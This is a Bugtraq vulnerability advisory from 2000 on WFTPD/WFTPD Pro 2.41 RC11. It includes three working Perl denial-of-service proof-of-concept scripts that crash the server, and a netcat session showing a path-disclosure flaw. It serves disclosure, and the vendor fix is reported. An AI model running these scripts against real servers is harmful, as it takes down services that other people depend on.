[15892] in bugtraq
WFTPD/WFTPD Pro 2.41 RC11 vulnerabilities.
daemon@ATHENA.MIT.EDU (Blue Panda)
Fri Jul 21 16:50:13 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_01BFF343.F236CFA0"
Content-Transfer-Encoding: 7bit
Message-Id: <200007210829.SAA01763@mailman.zeta.org.au>
Date: Fri, 21 Jul 2000 18:46:14 +1000
Reply-To: Blue Panda <bluepanda@DWARF.BOX.SK>
From: Blue Panda <bluepanda@DWARF.BOX.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_01BFF343.F236CFA0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
================================================================
Problem: Multiple vulnerabilities. See attached text files for details.
------=_NextPart_000_01BFF343.F236CFA0
Content-Type: application/octet-stream; name="wftpd241-11-1.txt"
Content-Transfer-Encoding: quoted-printable
Content-Description: wftpd241-11-1.txt (Text Document)
Content-Disposition: attachment; filename="wftpd241-11-1.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Details:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: If a STAT command is received whilst a LISTing is in progress, =
WFTPD
will crash.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC11, and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC12.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proof of concept:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends STAT without waiting for LIST to finish, which will cause the =
server
# to crash.
#
use IO::Socket;
$host =3D "ftp.host.com" ;
$port =3D "21";
$user =3D "anonymous";
$pass =3D "p\@nda";
$wait =3D 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$host, =
PeerPort=3D>$port) || die "failed.\n";
print "done.\n";
# Issue a LIST command, then STAT. If the STAT arrives before the =
LISTing
# is finished, the server will crash.
print $socket "USER $user\nPASS $pass\nLIST\nSTAT\n";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time =3D 0;
while ($time < $wait) {
sleep(1);
print ".";
$time +=3D 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
------=_NextPart_000_01BFF343.F236CFA0
Content-Type: application/octet-stream; name="wftpd241-11-2.txt"
Content-Transfer-Encoding: quoted-printable
Content-Description: wftpd241-11-2.txt (Text Document)
Content-Disposition: attachment; filename="wftpd241-11-2.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: If the REST command is used to write (with STOU, STOR or APPE) =
to
either past the end of a file or to a non-existant file, WFTPD will =
crash.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC11 and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC12.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proof of concept:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #2
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
use IO::Socket;
$host =3D "ftp.host.com" ;
$port =3D "21";
$user =3D "anonymous";
$pass =3D "p\@nda";
$wait =3D 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$host, =
PeerPort=3D>$port) || die "failed.\n";
print "done.\n";
print $socket "USER $user\nPASS $pass\nREST 1\nSTOU\n";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time =3D 0;
while ($time < $wait) {
sleep(1);
print ".";
$time +=3D 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
------=_NextPart_000_01BFF343.F236CFA0
Content-Type: application/octet-stream; name="wftpd241-11-3.txt"
Content-Transfer-Encoding: quoted-printable
Content-Description: wftpd241-11-3.txt (Text Document)
Content-Disposition: attachment; filename="wftpd241-11-3.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: STAT command devulges sensitive information.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC11, and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC12.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Details:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
If a transfer is in progress and a STAT command is issued, the full path =
of
the file being transfered is revealed, ie:
D:\utils\other\netcat>nc panda 21 -v -v
panda [192.168.1.1] 21 (ftp) open: unknown socket error
220 WFTPD 2.4 service (by Texas Imperial Software) ready for new user
user anonymous
331-Anonymous user access allowed - please enter your email
331-address as the password:
331 Give me your password, please
pass
230 Logged in successfully
retr test.txt
stat
211-panda FTP server status:
Transfer in progress:
D:\FTPROOT\test.txt
0 bytes into a 5130 byte file
211 End of status
425 Unable to open data connection - error=3D[10061] Connection refused
------=_NextPart_000_01BFF343.F236CFA0
Content-Type: application/octet-stream; name="wftpd241-11-4.txt"
Content-Transfer-Encoding: quoted-printable
Content-Description: wftpd241-11-4.txt (Text Document)
Content-Disposition: attachment; filename="wftpd241-11-4.txt"
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC11
21/07/2000 (dd/mm/yyyy)
bluepanda@dwarf.box.sk
http://bluepanda.box.sk/
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Problem: If an MLST command is sent without first logging on, WFTPD will
crash. MLST must be enabled for this to work (it is not, by default).
Vulnerable: WFTPD/WFTPD Pro 2.41 RC11 and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC12.
Vendor status: Notified. A fix has been released.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Proof of concept:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #3
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends an MLST command without logging in with USER and PASS first, =
causing
# WFTPD to crash. Note: MLST is not enabled by default, and must be for =
this
# to work.
#
use IO::Socket;
$host =3D "ftp.host.com" ;
$port =3D "21";
$wait =3D 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket =3D IO::Socket::INET->new(Proto=3D>"tcp", PeerAddr=3D>$host, =
PeerPort=3D>$port) || die "failed.\n";
print "done.\n";
print $socket "MLST a\n";
# Wait a while, just to make sure the command arrives.
print "Waiting...";
$time =3D 0;
while ($time < $wait) {
sleep(1);
print ".";
$time +=3D 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
------=_NextPart_000_01BFF343.F236CFA0--
